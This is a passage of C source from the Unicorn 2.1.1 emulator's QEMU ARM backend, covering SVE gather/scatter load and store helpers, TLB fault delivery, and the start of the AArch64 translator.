clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(vd, &scratch, oprsz); } static void sve_ld1_zd(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc) / 8; ARMVectorReg scratch = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; i++) { uint8_t pg = *(uint8_t *)((char *)vg + H1(i)); if (likely(pg & 1)) { target_ulong off = off_fn(vm, i * 8); tlb_fn(env, &scratch, i * 8, base + (off << scale), oi, ra); } } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. 
*/ memcpy(vd, &scratch, oprsz * 8); } #define DO_LD1_ZPZ_S(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_ld##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ld1_zs(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_s, sve_ld1##MEM##_tlb); \ } #define DO_LD1_ZPZ_D(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_ld##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ld1_zd(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_d, sve_ld1##MEM##_tlb); \ } DO_LD1_ZPZ_S(bsu, zsu) DO_LD1_ZPZ_S(bsu, zss) DO_LD1_ZPZ_D(bdu, zsu) DO_LD1_ZPZ_D(bdu, zss) DO_LD1_ZPZ_D(bdu, zd) DO_LD1_ZPZ_S(bss, zsu) DO_LD1_ZPZ_S(bss, zss) DO_LD1_ZPZ_D(bds, zsu) DO_LD1_ZPZ_D(bds, zss) DO_LD1_ZPZ_D(bds, zd) DO_LD1_ZPZ_S(hsu_le, zsu) DO_LD1_ZPZ_S(hsu_le, zss) DO_LD1_ZPZ_D(hdu_le, zsu) DO_LD1_ZPZ_D(hdu_le, zss) DO_LD1_ZPZ_D(hdu_le, zd) DO_LD1_ZPZ_S(hsu_be, zsu) DO_LD1_ZPZ_S(hsu_be, zss) DO_LD1_ZPZ_D(hdu_be, zsu) DO_LD1_ZPZ_D(hdu_be, zss) DO_LD1_ZPZ_D(hdu_be, zd) DO_LD1_ZPZ_S(hss_le, zsu) DO_LD1_ZPZ_S(hss_le, zss) DO_LD1_ZPZ_D(hds_le, zsu) DO_LD1_ZPZ_D(hds_le, zss) DO_LD1_ZPZ_D(hds_le, zd) DO_LD1_ZPZ_S(hss_be, zsu) DO_LD1_ZPZ_S(hss_be, zss) DO_LD1_ZPZ_D(hds_be, zsu) DO_LD1_ZPZ_D(hds_be, zss) DO_LD1_ZPZ_D(hds_be, zd) DO_LD1_ZPZ_S(ss_le, zsu) DO_LD1_ZPZ_S(ss_le, zss) DO_LD1_ZPZ_D(sdu_le, zsu) DO_LD1_ZPZ_D(sdu_le, zss) DO_LD1_ZPZ_D(sdu_le, zd) DO_LD1_ZPZ_S(ss_be, zsu) DO_LD1_ZPZ_S(ss_be, zss) DO_LD1_ZPZ_D(sdu_be, zsu) DO_LD1_ZPZ_D(sdu_be, zss) DO_LD1_ZPZ_D(sdu_be, zd) DO_LD1_ZPZ_D(sds_le, zsu) DO_LD1_ZPZ_D(sds_le, zss) DO_LD1_ZPZ_D(sds_le, zd) DO_LD1_ZPZ_D(sds_be, zsu) DO_LD1_ZPZ_D(sds_be, zss) DO_LD1_ZPZ_D(sds_be, zd) DO_LD1_ZPZ_D(dd_le, zsu) DO_LD1_ZPZ_D(dd_le, zss) DO_LD1_ZPZ_D(dd_le, zd) DO_LD1_ZPZ_D(dd_be, zsu) DO_LD1_ZPZ_D(dd_be, zss) DO_LD1_ZPZ_D(dd_be, zd) #undef DO_LD1_ZPZ_S #undef DO_LD1_ZPZ_D /* First fault loads with a vector index. */ /* Load one element into VD+REG_OFF from (ENV,VADDR) without faulting. * The controlling predicate is known to be true. Return true if the * load was successful. 
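 * The DO_LD_NF expansion only claims success when the whole element
 * fits within the current page and tlb_vaddr_to_host() already has a
 * host mapping for it; in every other case it returns false and the
 * caller records the element as faulted in FFR.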
*/ typedef bool sve_ld1_nf_fn(CPUARMState *env, void *vd, intptr_t reg_off, target_ulong vaddr, int mmu_idx); #ifdef _MSC_VER #define DO_LD_NF(NAME, H, TYPEE, TYPEM, HOST) \ static bool sve_ld##NAME##_nf(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, int mmu_idx) \ { \ struct uc_struct *uc = env->uc; \ target_ulong next_page = 0ULL - (addr | TARGET_PAGE_MASK); \ if (likely(next_page - addr >= sizeof(TYPEM))) { \ void *host = tlb_vaddr_to_host(env, addr, MMU_DATA_LOAD, mmu_idx); \ if (likely(host)) { \ TYPEM val = HOST(host); \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ return true; \ } \ } \ return false; \ } #else #define DO_LD_NF(NAME, H, TYPEE, TYPEM, HOST) \ static bool sve_ld##NAME##_nf(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, int mmu_idx) \ { \ struct uc_struct *uc = env->uc; \ target_ulong next_page = -(addr | TARGET_PAGE_MASK); \ if (likely(next_page - addr >= sizeof(TYPEM))) { \ void *host = tlb_vaddr_to_host(env, addr, MMU_DATA_LOAD, mmu_idx); \ if (likely(host)) { \ TYPEM val = HOST(host); \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ return true; \ } \ } \ return false; \ } #endif DO_LD_NF(bsu, H1_4, uint32_t, uint8_t, ldub_p) DO_LD_NF(bss, H1_4, uint32_t, int8_t, ldsb_p) DO_LD_NF(bdu, , uint64_t, uint8_t, ldub_p) DO_LD_NF(bds, , uint64_t, int8_t, ldsb_p) DO_LD_NF(hsu_le, H1_4, uint32_t, uint16_t, lduw_le_p) DO_LD_NF(hss_le, H1_4, uint32_t, int16_t, ldsw_le_p) DO_LD_NF(hsu_be, H1_4, uint32_t, uint16_t, lduw_be_p) DO_LD_NF(hss_be, H1_4, uint32_t, int16_t, ldsw_be_p) DO_LD_NF(hdu_le, , uint64_t, uint16_t, lduw_le_p) DO_LD_NF(hds_le, , uint64_t, int16_t, ldsw_le_p) DO_LD_NF(hdu_be, , uint64_t, uint16_t, lduw_be_p) DO_LD_NF(hds_be, , uint64_t, int16_t, ldsw_be_p) DO_LD_NF(ss_le, H1_4, uint32_t, uint32_t, ldl_le_p) DO_LD_NF(ss_be, H1_4, uint32_t, uint32_t, ldl_be_p) DO_LD_NF(sdu_le, , uint64_t, uint32_t, ldl_le_p) DO_LD_NF(sds_le, , uint64_t, int32_t, ldl_le_p) DO_LD_NF(sdu_be, , uint64_t, uint32_t, ldl_be_p) DO_LD_NF(sds_be, , uint64_t, int32_t, ldl_be_p) DO_LD_NF(dd_le, , uint64_t, uint64_t, ldq_le_p) DO_LD_NF(dd_be, , uint64_t, uint64_t, ldq_be_p) /* * Common helper for all gather first-faulting loads. */ static inline void sve_ldff1_zs(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn, sve_ld1_nf_fn *nonfault_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t reg_off, reg_max = simd_oprsz(desc); target_ulong addr; /* Skip to the first true predicate. */ reg_off = find_next_active(vg, 0, reg_max, MO_32); if (likely(reg_off < reg_max)) { /* Perform one normal read, which will fault or not. */ set_helper_retaddr(ra); addr = off_fn(vm, reg_off); addr = base + (addr << scale); tlb_fn(env, vd, reg_off, addr, oi, ra); /* The rest of the reads will be non-faulting. */ clear_helper_retaddr(); } /* After any fault, zero the leading predicated false elements. 
*/ swap_memzero(vd, reg_off); while (likely((reg_off += 4) < reg_max)) { uint64_t pg = *(uint64_t *)((char *)vg + (reg_off >> 6) * 8); if (likely((pg >> (reg_off & 63)) & 1)) { addr = off_fn(vm, reg_off); addr = base + (addr << scale); if (!nonfault_fn(env, vd, reg_off, addr, mmu_idx)) { record_fault(env, reg_off, reg_max); break; } } else { *(uint32_t *)((char *)vd + H1_4(reg_off)) = 0; } } } static inline void sve_ldff1_zd(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn, sve_ld1_nf_fn *nonfault_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t reg_off, reg_max = simd_oprsz(desc); target_ulong addr; /* Skip to the first true predicate. */ reg_off = find_next_active(vg, 0, reg_max, MO_64); if (likely(reg_off < reg_max)) { /* Perform one normal read, which will fault or not. */ set_helper_retaddr(ra); addr = off_fn(vm, reg_off); addr = base + (addr << scale); tlb_fn(env, vd, reg_off, addr, oi, ra); /* The rest of the reads will be non-faulting. */ clear_helper_retaddr(); } /* After any fault, zero the leading predicated false elements. */ swap_memzero(vd, reg_off); while (likely((reg_off += 8) < reg_max)) { uint8_t pg = *(uint8_t *)((char *)vg + H1(reg_off >> 3)); if (likely(pg & 1)) { addr = off_fn(vm, reg_off); addr = base + (addr << scale); if (!nonfault_fn(env, vd, reg_off, addr, mmu_idx)) { record_fault(env, reg_off, reg_max); break; } } else { *(uint64_t *)((char *)vd + reg_off) = 0; } } } #define DO_LDFF1_ZPZ_S(MEM, OFS) \ void HELPER(sve_ldff##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ldff1_zs(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_s, sve_ld1##MEM##_tlb, sve_ld##MEM##_nf); \ } #define DO_LDFF1_ZPZ_D(MEM, OFS) \ void HELPER(sve_ldff##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ldff1_zd(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_d, sve_ld1##MEM##_tlb, sve_ld##MEM##_nf); \ } DO_LDFF1_ZPZ_S(bsu, zsu) DO_LDFF1_ZPZ_S(bsu, zss) DO_LDFF1_ZPZ_D(bdu, zsu) DO_LDFF1_ZPZ_D(bdu, zss) DO_LDFF1_ZPZ_D(bdu, zd) DO_LDFF1_ZPZ_S(bss, zsu) DO_LDFF1_ZPZ_S(bss, zss) DO_LDFF1_ZPZ_D(bds, zsu) DO_LDFF1_ZPZ_D(bds, zss) DO_LDFF1_ZPZ_D(bds, zd) DO_LDFF1_ZPZ_S(hsu_le, zsu) DO_LDFF1_ZPZ_S(hsu_le, zss) DO_LDFF1_ZPZ_D(hdu_le, zsu) DO_LDFF1_ZPZ_D(hdu_le, zss) DO_LDFF1_ZPZ_D(hdu_le, zd) DO_LDFF1_ZPZ_S(hsu_be, zsu) DO_LDFF1_ZPZ_S(hsu_be, zss) DO_LDFF1_ZPZ_D(hdu_be, zsu) DO_LDFF1_ZPZ_D(hdu_be, zss) DO_LDFF1_ZPZ_D(hdu_be, zd) DO_LDFF1_ZPZ_S(hss_le, zsu) DO_LDFF1_ZPZ_S(hss_le, zss) DO_LDFF1_ZPZ_D(hds_le, zsu) DO_LDFF1_ZPZ_D(hds_le, zss) DO_LDFF1_ZPZ_D(hds_le, zd) DO_LDFF1_ZPZ_S(hss_be, zsu) DO_LDFF1_ZPZ_S(hss_be, zss) DO_LDFF1_ZPZ_D(hds_be, zsu) DO_LDFF1_ZPZ_D(hds_be, zss) DO_LDFF1_ZPZ_D(hds_be, zd) DO_LDFF1_ZPZ_S(ss_le, zsu) DO_LDFF1_ZPZ_S(ss_le, zss) DO_LDFF1_ZPZ_D(sdu_le, zsu) DO_LDFF1_ZPZ_D(sdu_le, zss) DO_LDFF1_ZPZ_D(sdu_le, zd) DO_LDFF1_ZPZ_S(ss_be, zsu) DO_LDFF1_ZPZ_S(ss_be, zss) DO_LDFF1_ZPZ_D(sdu_be, zsu) DO_LDFF1_ZPZ_D(sdu_be, zss) DO_LDFF1_ZPZ_D(sdu_be, zd) DO_LDFF1_ZPZ_D(sds_le, zsu) DO_LDFF1_ZPZ_D(sds_le, zss) DO_LDFF1_ZPZ_D(sds_le, zd) DO_LDFF1_ZPZ_D(sds_be, zsu) DO_LDFF1_ZPZ_D(sds_be, zss) DO_LDFF1_ZPZ_D(sds_be, zd) DO_LDFF1_ZPZ_D(dd_le, zsu) DO_LDFF1_ZPZ_D(dd_le, zss) DO_LDFF1_ZPZ_D(dd_le, zd) DO_LDFF1_ZPZ_D(dd_be, zsu) 
DO_LDFF1_ZPZ_D(dd_be, zss) DO_LDFF1_ZPZ_D(dd_be, zd) /* Stores with a vector index. */ static void sve_st1_zs(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc); set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (likely(pg & 1)) { target_ulong off = off_fn(vm, i); tlb_fn(env, vd, i, base + (off << scale), oi, ra); } i += 4, pg >>= 4; } while (i & 15); } clear_helper_retaddr(); } static void sve_st1_zd(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc) / 8; set_helper_retaddr(ra); for (i = 0; i < oprsz; i++) { uint8_t pg = *(uint8_t *)((char *)vg + H1(i)); if (likely(pg & 1)) { target_ulong off = off_fn(vm, i * 8); tlb_fn(env, vd, i * 8, base + (off << scale), oi, ra); } } clear_helper_retaddr(); } #define DO_ST1_ZPZ_S(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_st##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_st1_zs(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_s, sve_st1##MEM##_tlb); \ } #define DO_ST1_ZPZ_D(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_st##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_st1_zd(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_d, sve_st1##MEM##_tlb); \ } DO_ST1_ZPZ_S(bs, zsu) DO_ST1_ZPZ_S(hs_le, zsu) DO_ST1_ZPZ_S(hs_be, zsu) DO_ST1_ZPZ_S(ss_le, zsu) DO_ST1_ZPZ_S(ss_be, zsu) DO_ST1_ZPZ_S(bs, zss) DO_ST1_ZPZ_S(hs_le, zss) DO_ST1_ZPZ_S(hs_be, zss) DO_ST1_ZPZ_S(ss_le, zss) DO_ST1_ZPZ_S(ss_be, zss) DO_ST1_ZPZ_D(bd, zsu) DO_ST1_ZPZ_D(hd_le, zsu) DO_ST1_ZPZ_D(hd_be, zsu) DO_ST1_ZPZ_D(sd_le, zsu) DO_ST1_ZPZ_D(sd_be, zsu) DO_ST1_ZPZ_D(dd_le, zsu) DO_ST1_ZPZ_D(dd_be, zsu) DO_ST1_ZPZ_D(bd, zss) DO_ST1_ZPZ_D(hd_le, zss) DO_ST1_ZPZ_D(hd_be, zss) DO_ST1_ZPZ_D(sd_le, zss) DO_ST1_ZPZ_D(sd_be, zss) DO_ST1_ZPZ_D(dd_le, zss) DO_ST1_ZPZ_D(dd_be, zss) DO_ST1_ZPZ_D(bd, zd) DO_ST1_ZPZ_D(hd_le, zd) DO_ST1_ZPZ_D(hd_be, zd) DO_ST1_ZPZ_D(sd_le, zd) DO_ST1_ZPZ_D(sd_be, zd) DO_ST1_ZPZ_D(dd_le, zd) DO_ST1_ZPZ_D(dd_be, zd) #undef DO_ST1_ZPZ_S #undef DO_ST1_ZPZ_D 
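
/*
 * A minimal, self-contained sketch (not part of the Unicorn/QEMU sources)
 * of the first-fault gather-load contract that the DO_LDFF1_ZPZ_* helpers
 * above implement. All names below (ldff1_model, read_nf_fn) are
 * illustrative stand-ins: in the real helpers the first active element is
 * read through tlb_fn() and is allowed to fault architecturally, later
 * active elements use the non-faulting sve_ld*_nf() path, and
 * record_fault() truncates the first-fault register (FFR) at the first
 * element that could not be read.
 */
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical non-faulting read: returns false instead of trapping. */
typedef bool (*read_nf_fn)(uint64_t addr, uint64_t *out);

static size_t ldff1_model(uint64_t *vd, const bool *pg, const uint64_t *offs,
                          uint64_t base, size_t n, read_nf_fn read_nf)
{
    size_t valid = n;

    for (size_t i = 0; i < n; i++) {
        if (!pg[i]) {
            vd[i] = 0;          /* predicated-false lanes are zeroed */
            continue;
        }
        if (!read_nf(base + offs[i], &vd[i])) {
            valid = i;          /* first failed element: stop here ... */
            break;              /* ... caller truncates FFR to i elements */
        }
    }
    return valid;
}
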
unicorn-2.1.1/qemu/target/arm/tlb_helper.c
/*
 * ARM TLB (Translation lookaside buffer) helpers.
 *
 * This code is licensed under the GNU GPL v2 or later.
 *
 * SPDX-License-Identifier: GPL-2.0-or-later
 */
#include "qemu/osdep.h"
#include "cpu.h"
#include "internals.h"
#include "exec/exec-all.h"

static inline uint32_t merge_syn_data_abort(uint32_t template_syn,
                                            unsigned int target_el,
                                            bool same_el, bool ea,
                                            bool s1ptw, bool is_write,
                                            int fsc)
{
    uint32_t syn;

    /*
     * ISV is only set for data aborts routed to EL2 and
     * never for stage-1 page table walks faulting on stage 2.
     *
     * Furthermore, ISV is only set for certain kinds of load/stores.
     * If the template syndrome does not have ISV set, we should leave
     * it cleared.
     *
     * See ARMv8 specs, D7-1974:
     * ISS encoding for an exception from a Data Abort, the
     * ISV field.
     */
    if (!(template_syn & ARM_EL_ISV) || target_el != 2 || s1ptw) {
        syn = syn_data_abort_no_iss(same_el, ea, 0, s1ptw, is_write, fsc);
    } else {
        /*
         * Fields: IL, ISV, SAS, SSE, SRT, SF and AR come from the template
         * syndrome created at translation time.
         * Now we create the runtime syndrome with the remaining fields.
         */
        syn = syn_data_abort_with_iss(same_el, 0, 0, 0, 0, 0, ea, 0, s1ptw,
                                      is_write, fsc, true);
        /* Merge the runtime syndrome with the template syndrome. */
        syn |= template_syn;
    }
    return syn;
}

static void QEMU_NORETURN arm_deliver_fault(ARMCPU *cpu, vaddr addr,
                                            MMUAccessType access_type,
                                            int mmu_idx, ARMMMUFaultInfo *fi)
{
    CPUARMState *env = &cpu->env;
    int target_el;
    bool same_el;
    uint32_t syn, exc, fsr, fsc;
    ARMMMUIdx arm_mmu_idx = core_to_arm_mmu_idx(env, mmu_idx);

    target_el = exception_target_el(env);
    if (fi->stage2) {
        target_el = 2;
        env->cp15.hpfar_el2 = extract64(fi->s2addr, 12, 47) << 4;
    }
    same_el = (arm_current_el(env) == target_el);

    if (target_el == 2 || arm_el_is_aa64(env, target_el) ||
        arm_s1_regime_using_lpae_format(env, arm_mmu_idx)) {
        /*
         * LPAE format fault status register: bottom 6 bits are
         * status code in the same form as needed for syndrome
         */
        fsr = arm_fi_to_lfsc(fi);
        fsc = extract32(fsr, 0, 6);
    } else {
        fsr = arm_fi_to_sfsc(fi);
        /*
         * Short format FSR: this fault will never actually be reported
         * to an EL that uses a syndrome register. Use a (currently)
         * reserved FSR code in case the constructed syndrome does leak
         * into the guest somehow.
*/ fsc = 0x3f; } if (access_type == MMU_INST_FETCH) { syn = syn_insn_abort(same_el, fi->ea, fi->s1ptw, fsc); exc = EXCP_PREFETCH_ABORT; } else { syn = merge_syn_data_abort(env->exception.syndrome, target_el, same_el, fi->ea, fi->s1ptw, access_type == MMU_DATA_STORE, fsc); if (access_type == MMU_DATA_STORE && arm_feature(env, ARM_FEATURE_V6)) { fsr |= (1 << 11); } exc = EXCP_DATA_ABORT; } env->exception.vaddress = addr; env->exception.fsr = fsr; raise_exception(env, exc, syn, target_el); } /* Raise a data fault alignment exception for the specified virtual address */ void arm_cpu_do_unaligned_access(CPUState *cs, vaddr vaddr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { ARMCPU *cpu = ARM_CPU(cs); ARMMMUFaultInfo fi = { 0 }; /* now we have a real cpu fault */ cpu_restore_state(cs, retaddr, true); fi.type = ARMFault_Alignment; arm_deliver_fault(cpu, vaddr, access_type, mmu_idx, &fi); } /* * arm_cpu_do_transaction_failed: handle a memory system error response * (eg "no device/memory present at address") by raising an external abort * exception */ void arm_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { ARMCPU *cpu = ARM_CPU(cs); ARMMMUFaultInfo fi = { 0 }; /* now we have a real cpu fault */ cpu_restore_state(cs, retaddr, true); fi.ea = arm_extabort_type(response); fi.type = ARMFault_SyncExternal; arm_deliver_fault(cpu, addr, access_type, mmu_idx, &fi); } bool arm_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { struct uc_struct *uc = cs->uc; ARMCPU *cpu = ARM_CPU(cs); hwaddr phys_addr; target_ulong page_size; int prot, ret; MemTxAttrs attrs = { 0 }; ARMMMUFaultInfo fi = { 0 }; /* * Walk the page table and (if the mapping exists) add the page * to the TLB. On success, return true. Otherwise, if probing, * return false. Otherwise populate fsr with ARM DFSR/IFSR fault * register format, and signal the fault. */ ret = get_phys_addr(&cpu->env, address, access_type, core_to_arm_mmu_idx(&cpu->env, mmu_idx), &phys_addr, &attrs, &prot, &page_size, &fi, NULL); if (likely(!ret)) { /* * Map a single [sub]page. Regions smaller than our declared * target page size are handled specially, so for those we * pass in the exact addresses. 
         */
        if (page_size >= TARGET_PAGE_SIZE) {
            phys_addr &= TARGET_PAGE_MASK;
            address &= TARGET_PAGE_MASK;
        }
        tlb_set_page_with_attrs(cs, address, phys_addr, attrs,
                                prot, mmu_idx, page_size);
        return true;
    } else if (probe) {
        return false;
    } else {
        /* now we have a real cpu fault */
        cpu_restore_state(cs, retaddr, true);
        arm_deliver_fault(cpu, address, access_type, mmu_idx, &fi);
    }
}
unicorn-2.1.1/qemu/target/arm/translate-a64.c
/*
 * AArch64 translation
 *
 * Copyright (c) 2013 Alexander Graf <agraf@suse.de>
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */
#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "tcg/tcg-op.h"
#include "tcg/tcg-op-gvec.h"
#include "qemu/log.h"
#include "arm_ldst.h"
#include "translate.h"
#include "internals.h"
#include "qemu/host-utils.h"
#include "exec/gen-icount.h"
#include "exec/helper-proto.h"
#include "exec/helper-gen.h"
#include "translate-a64.h"
#include "qemu/atomic128.h"
#include "kvm-consts.h"

static const char *regnames[] = {
    "x0", "x1", "x2", "x3", "x4", "x5", "x6", "x7",
    "x8", "x9", "x10", "x11", "x12", "x13", "x14", "x15",
    "x16", "x17", "x18", "x19", "x20", "x21", "x22", "x23",
    "x24", "x25", "x26", "x27", "x28", "x29", "lr", "sp"
};

enum a64_shift_type {
    A64_SHIFT_TYPE_LSL = 0,
    A64_SHIFT_TYPE_LSR = 1,
    A64_SHIFT_TYPE_ASR = 2,
    A64_SHIFT_TYPE_ROR = 3
};

/* Table based decoder typedefs - used when the relevant bits for decode
 * are too awkwardly scattered across the instruction (eg SIMD).
*/ typedef void AArch64DecodeFn(DisasContext *s, uint32_t insn); typedef struct AArch64DecodeTable { uint32_t pattern; uint32_t mask; AArch64DecodeFn *disas_fn; } AArch64DecodeTable; /* Function prototype for gen_ functions for calling Neon helpers */ typedef void NeonGenOneOpEnvFn(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32); typedef void NeonGenTwoOpFn(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32); typedef void NeonGenTwoOpEnvFn(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32); typedef void NeonGenTwo64OpFn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64); typedef void NeonGenTwo64OpEnvFn(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64); typedef void NeonGenNarrowFn(TCGContext *, TCGv_i32, TCGv_i64); typedef void NeonGenNarrowEnvFn(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i64); typedef void NeonGenWidenFn(TCGContext *, TCGv_i64, TCGv_i32); typedef void NeonGenTwoSingleOPFn(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); typedef void NeonGenTwoDoubleOPFn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_ptr); typedef void NeonGenOneOpFn(TCGContext *, TCGv_i64, TCGv_i64); typedef void CryptoTwoOpFn(TCGContext *, TCGv_ptr, TCGv_ptr); typedef void CryptoThreeOpIntFn(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_i32); typedef void CryptoThreeOpFn(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr); typedef void AtomicThreeOpFn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGArg, MemOp); /* initialize TCG globals. */ void a64_translate_init(struct uc_struct *uc) { int i; TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->cpu_pc_arm64 = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, pc), "pc"); for (i = 0; i < 32; i++) { tcg_ctx->cpu_X[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, xregs[i]), regnames[i]); } tcg_ctx->cpu_exclusive_high = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, exclusive_high), "exclusive_high"); } /* * Return the core mmu_idx to use for A64 "unprivileged load/store" insns */ static int get_a64_user_mem_index(DisasContext *s) { /* * If AccType_UNPRIV is not used, the insn uses AccType_NORMAL, * which is the usual mmu_idx for this cpu state. */ ARMMMUIdx useridx = s->mmu_idx; if (s->unpriv) { /* * We have pre-computed the condition for AccType_UNPRIV. * Therefore we should never get here with a mmu_idx for * which we do not know the corresponding user mmu_idx. */ switch (useridx) { case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: useridx = ARMMMUIdx_E10_0; break; case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: useridx = ARMMMUIdx_E20_0; break; case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: useridx = ARMMMUIdx_SE10_0; break; default: g_assert_not_reached(); } } return arm_to_core_mmu_idx(useridx); } static void reset_btype(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->btype != 0) { TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_st_i32(tcg_ctx, zero, tcg_ctx->cpu_env, offsetof(CPUARMState, btype)); tcg_temp_free_i32(tcg_ctx, zero); s->btype = 0; } } static void set_btype(DisasContext *s, int val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_val; /* BTYPE is a 2-bit field, and 0 should be done with reset_btype. */ tcg_debug_assert(val >= 1 && val <= 3); tcg_val = tcg_const_i32(tcg_ctx, val); tcg_gen_st_i32(tcg_ctx, tcg_val, tcg_ctx->cpu_env, offsetof(CPUARMState, btype)); tcg_temp_free_i32(tcg_ctx, tcg_val); s->btype = -1; } void gen_a64_set_pc_im(TCGContext *tcg_ctx, uint64_t val) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_pc_arm64, val); } /* * Handle Top Byte Ignore (TBI) bits. 
 *
 * If address tagging is enabled via the TCR TBI bits:
 *  + for EL2 and EL3 there is only one TBI bit, and if it is set
 *    then the address is zero-extended, clearing bits [63:56]
 *  + for EL0 and EL1, TBI0 controls addresses with bit 55 == 0
 *    and TBI1 controls addresses with bit 55 == 1.
 *    If the appropriate TBI bit is set for the address then
 *    the address is sign-extended from bit 55 into bits [63:56]
 *
 * Here we have concatenated TBI{1,0} into tbi.
 */
static void gen_top_byte_ignore(DisasContext *s, TCGv_i64 dst,
                                TCGv_i64 src, int tbi)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    if (tbi == 0) {
        /* Load unmodified address */
